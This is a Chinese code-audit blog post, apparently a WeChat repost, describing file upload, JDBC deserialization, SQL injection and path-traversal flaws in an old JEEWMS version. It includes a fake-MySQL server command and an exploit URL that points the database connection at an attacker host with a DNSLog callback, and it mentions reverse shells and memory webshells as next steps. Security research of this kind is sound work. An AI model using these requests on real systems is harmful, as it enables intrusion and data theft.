点击蓝字
关注我们
日期:2025/04/14
作者:Corl7
介绍:老版JEEWMS代码审计。
0x00 前言
JEEWMS是基于Java全栈技术打造的智能仓储中枢系统,具备多形态仓储场景深度适配能力(兼容3PL第三方物流与厂内物流双模式)。该系统使用SpringMVC框架,Mysql数据库,本次审计是对老版本的JEEWMS系统进行审计。
0x01 文件上传
查看该代码,主要是获取应用程序的根目录路径并拼接文件名作为上传路径,然后调用new File进行文件上传。
构造数据包,进行文件上传,响应操作成功。
成功访问上传后的aaa.jsp。
0x02 JDBC反序列化
这段代码的主要功能是测试数据库连接是否成功,从dbSource中获取DriverClass、Url、DbUser、DbPassword的值,然后进行创建数据库连接,并且这些参数可以从前端获取。
在pom.xml中引入的mysql版本为5.1.27,该版本是存在JDBC反序列化的。
使用fake-mysql-cli-0.0.4工具在服务器中起一个服务。
java -jar fake-mysql-cli-0.0.4.jar -p 8787
使用burp进行发包,显示数据库连接失败,但是这没有关系。
/jeewms/dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://x.x.x.x:8787/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&dbUser=deser_URLDNS_http://7x8gp9.dnslog.cn
DNSLog成功收到请求。
0x03 SQL注入
SQL注入该系统存在很多,本次只针对其中一个进行审计。查看该接口,发现configId参数值从前端获取,并且传入cgReportService.queryCgReportConfig方法。
查看queryCgReportConfig实现方法,在queryCgReportConfig方法中又调用了queryCgReportMainConfig方法,并且把reportId传给了该方法,在queryCgReportMainConfig方法中又调用了cgReportDao.queryCgReportMainConfig方法。
该方法的SQL语句中使用$拼接了configId的值,造成了SQL注入。
构造数据包。
使用SQLmap成功跑出注入。
0x04 任意文件读取
该代码接收down、dbPath参数的值,判断flag的值是否等于1。如果等于1,则表示请求是下载文件并对文件名进行url编码,否则,表示请求是显示图片。读取路径首先从配置文件中获取webUploadpath的值,然后再拼接dbPath的值,再进行读取。
全局搜索webUploadpath,发现在sysConfig.properties中定义了该值,在C盘upfiles目录下。
在C盘根目录创建test.txt,内容为test。构造数据包,使用两个../,成功读取test.txt。
当down等于1时,会对文件名进行URL编码。
0x05 总结
JEEWMS系统存在不少类型的漏洞,但是本篇文章并未涉及到该系统的全部漏洞。但其中的JDBC反序列化漏洞不是很常见,除了ping dnslog外,还可以尝试反弹shell、打内存马等。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
点此亲启
原文始发于微信公众号(宸极实验室):『代码审计』JEEWMS代码审计
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论